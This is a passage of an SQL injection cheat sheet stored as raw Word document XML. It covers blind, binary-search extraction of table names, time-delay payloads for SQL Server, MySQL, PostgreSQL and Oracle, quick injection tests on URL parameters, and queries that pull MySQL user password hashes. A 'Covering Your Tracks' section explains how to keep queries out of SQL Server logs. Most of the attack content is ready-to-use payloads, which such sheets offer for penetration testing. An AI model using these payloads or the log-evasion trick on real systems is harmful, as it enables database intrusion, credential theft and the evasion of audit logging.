        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;89-- </w:t>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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) </w:t>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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;83-- </w:t>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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) </w:t>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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;80-- </w:t>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color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6A5C6"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Since both of the </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>last 2 queries failed </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>we clearly know table name's first char's </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ascii value is 80 which means first char is `P`</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. This is the way to exploit Blind SQL injections by binary search algorithm. Other well-known way is reading data bit by bit. Both can be effective in different conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63324CE2"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC5D89"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Making Databases Wait / Sleep For Blind SQL Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D05AC"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First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF541B"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WAITFOR DELAY 'time' (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A4143"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This is just like sleep, wait for specified time. CPU safe way to make database wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E67CAE"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WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A1B24"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Also, you can use fractions like this,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18001E8E"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WAITFOR DELAY '0:0:0.51'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0E555"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Real World Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528ACD1D" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Are we 'sa' ?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if (select user) = 'sa' waitfor delay '0:0:10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EBA635" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ProductID = </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>1;waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3853FC79" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ProductID =</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>1);waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090970CC" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ProductID =</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>1';waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38F67C" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ProductID =</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>1');waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654CB9E" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ProductID =</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>1));waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E141455" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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ProductID =</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>1'));waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CF9F6"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BENCHMARK() (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE409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Basically, we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F309BC0"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BENCHMARK(howmanytimes, do this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3E5C0"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Real World Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21C340" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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Are we root ? woot!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IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C598C" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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Check Table exist in MySQL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IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78142DE4"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pg_sleep(seconds) (P)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39318275"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Sleep for supplied seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B669B72" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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pg_sleep(10); </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Sleep 10 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A662F31"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sleep(seconds) (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2D4F47"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Sleep for supplied seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4746E2" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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sleep(10); </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Sleep 10 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77421E"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dbms_pipe.receive_message (O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D302FAB"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Sleep for supplied seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA1AADB" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:num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CASE WHEN (NVL(ASCII(SUBSTR((</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>{INJECTION}</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),10) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11247797" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>{INJECTION}</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> = You want to run the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0CA237" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>If the condition is true, will response after 10 seconds. If is false, will be delayed for one second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7E0F5" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>Covering Your Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E140F"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SQL Server -sp_password log bypass (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F94635C"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lastRenderedPageBreak/>
        <w:t>SQL Server don't log queries that includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>of course still will be in web server logs</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>try to use POST if it's possible</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB48714" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>Clear SQL Injection Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAEEF1F"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These tests are simply good for blind sql injection and silent attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64183E78" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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product.asp?id=4 (SMO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11216301" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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product.asp?id=5-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFD5EF" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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product.asp?id=4 OR 1=1 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F10FC" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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product.asp?name=Book</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB6140" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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product.asp?name=Bo'%2b'ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E9597" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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product.asp?name=Bo' || 'ok (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>OM</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D8452" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>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product.asp?name=Book' OR 'x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7639F5AF" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>Extra MySQL Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289327BF"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Sub Queries are working only MySQL 4.1+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306896E4"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Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37716DC3"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lastRenderedPageBreak/>
        <w:t>SELECT User,Password FROM mysql.user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CAFE1"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1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5143FCA4"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 INTO DUMPFILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FF85E"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Write query into a </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
